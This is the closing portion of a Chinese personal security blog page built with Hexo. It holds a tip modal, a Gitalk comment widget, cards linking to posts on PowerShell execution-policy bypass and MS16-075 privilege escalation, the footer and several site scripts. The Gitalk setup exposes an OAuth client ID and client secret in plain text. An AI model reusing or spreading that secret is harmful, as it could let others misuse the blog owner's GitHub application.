        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">如果感觉对您有帮助，请我吃包辣条吧</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    
        <link rel="stylesheet" href="/libs/gitalk/gitalk.css">
<link rel="stylesheet" href="/css/my-gitalk.css">

<div class="card gitalk-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="gitalk-container" class="card-content"></div>
</div>

<script src="/libs/gitalk/gitalk.min.js"></script>
<script>
    let gitalk = new Gitalk({
        clientID: 'd75ec1a5864747376f6f',
        clientSecret: 'b4751152ca815e8e538c64da23e2a371fa1fb2db',
        repo: 'hexo-gitalk',
        owner: 'shuai06',
        admin: "shuai06",
        id: '2020-05-09T17-15-16',
        distractionFreeMode: false  // Facebook-like distraction free mode
    });

    gitalk.render('gitalk-container');
</script>

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/posts/15127/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/12.jpg" class="responsive-img" alt="PowerShell执行策略的简单绕过">
                        
                        <span class="card-title">PowerShell执行策略的简单绕过</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            执行策略Get-ExecutionPolicy   #查看当前策略

# 四种
- Restricted        #脚本不能运行（默认）
- RemoteSigned      #本地创建的脚本可以运行，但从网上下载的脚本不能运行
-
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2020-05-09
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/渗透测试/" class="post-category">
                                    渗透测试
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/PowerShel/">
                        <span class="chip bg-color">PowerShel</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/posts/29481/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/7.jpg" class="responsive-img" alt="ms-16075提权Windows Server 2008">
                        
                        <span class="card-title">ms-16075提权Windows Server 2008</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
光看网上的文章是不够的，还是要多动手才行

ms16-075漏洞简介Windows SMB 服务器特权提升漏洞（CVE漏洞编号：CVE-2016-3225）当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时，Microsoft
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2020-05-09
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/渗透测试/" class="post-category">
                                    渗透测试
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/渗透测试/">
                        <span class="chip bg-color">渗透测试</span>
                    </a>
                    
                    <a href="/tags/烂土豆/">
                        <span class="chip bg-color">烂土豆</span>
                    </a>
                    
                    <a href="/tags/提权/">
                        <span class="chip bg-color">提权</span>
                    </a>
                    
                    <a href="/tags/ms-16075/">
                        <span class="chip bg-color">ms-16075</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('120')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: 剑胆琴心<br />'
            + '文章作者: 剑胆琴心<br />'
            + '文章链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


<!-- 代码块折行 -->


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('1'),
            headingSelector: 'h1, h2, h3, h4, h5, h6'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h1, h2, h3, h4, h5, h6').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
    <div class="container row center-align" style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            <span id="year">2019</span>
            <a href="http://www.xpshuai.cn" target="_blank">剑胆琴心</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">472k</span>&nbsp;字
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <span id="sitetime">载入运行时间...</span>
            <script>
                function siteTime() {
                    var seconds = 1000;
                    var minutes = seconds * 60;
                    var hours = minutes * 60;
                    var days = hours * 24;
                    var years = days * 365;
                    var today = new Date();
                    var startYear = "2019";
                    var startMonth = "4";
                    var startDate = "20";
                    var startHour = "15";
                    var startMinute = "0";
                    var startSecond = "0";
                    var todayYear = today.getFullYear();
                    var todayMonth = today.getMonth() + 1;
                    var todayDate = today.getDate();
                    var todayHour = today.getHours();
                    var todayMinute = today.getMinutes();
                    var todaySecond = today.getSeconds();
                    var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                    var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                    var diff = t2 - t1;
                    var diffYears = Math.floor(diff / years);
                    var diffDays = Math.floor((diff / days) - diffYears * 365);
                    var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
                    var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) /
                        minutes);
                    var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours -
                        diffMinutes * minutes) / seconds);
                    if (startYear == todayYear) {
                        document.getElementById("year").innerHTML = todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffDays + " 天 " + diffHours +
                            " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    } else {
                        document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffYears + " 年 " + diffDays +
                            " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    }
                }
                setInterval(siteTime, 1000);
            </script>
            
            <br>
            
            <span id="icp"><img src="/medias/icp.png" style="vertical-align: text-bottom;" />
                <a href="http://www.beianbeian.com/beianxinxi/816345dfd53e0153acde20c5bb1dd1b0.html" target="_blank">冀ICP备18027796号-1</a>
            </span>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/shuai06" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:2944282625@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=2944282625" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 2944282625" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc("/search.json", 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    
        <script src="//code.tidio.co/xfg3rji2iq4povfdtfxiwk4smqduoso6.js"></script>
        <script>
            $(document).ready(function () {
                setInterval(change_Tidio, 50);
                function change_Tidio() {
                    var tidio=$("#tidio-chat iframe");
                    if(tidio.css("display")=="block"&& $(window).width()>977 ){
                        document.getElementById("tidio-chat-iframe").style.bottom= ($("div#backTop.top-scroll").css("display")=="none" &&$(window).width()>977)>0? "-40px" : ($("div.toc-title").length&&$(window).width()>977)>0?"85px":"20px";
                        document.getElementById("tidio-chat-iframe").style.right="-15px";
                        document.getElementById("tidio-chat-iframe").style.height=parseInt(tidio.css("height"))>=520?"520px":tidio.css("height");
                        document.getElementById("tidio-chat-iframe").style.zIndex="997";
                    }
                    else if(tidio.css("display")=="block"&&$(window).width()>601 &&$(window).width()<992 ){
                        document.getElementById("tidio-chat-iframe").style.bottom= ($("div#backTop.top-scroll").css("display")=="none" && 601< $(window).width()<992)>0? "-40px":"20px" ;
                        document.getElementById("tidio-chat-iframe").style.right="-15px";
                        document.getElementById("tidio-chat-iframe").style.zIndex="997";
                    }
                    else if(tidio.css("display")=="block"&&$(window).width()<601 && parseInt(tidio.css("height"))<230){
                        document.getElementById("tidio-chat-iframe").style.bottom= ($("div#backTop.top-scroll").css("display")=="none" && $(window).width()<601)>0? "-10px":"45px" ;
                        document.getElementById("tidio-chat-iframe").style.zIndex="997";
                    }
                    if( tidio.css("display")=="block"&&$(window).width()<601 && parseInt(tidio.css("height"))>=230){
                        document.getElementById("tidio-chat-iframe").style.zIndex="998";
                    }
                }
            });
        </script>
    

    

    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
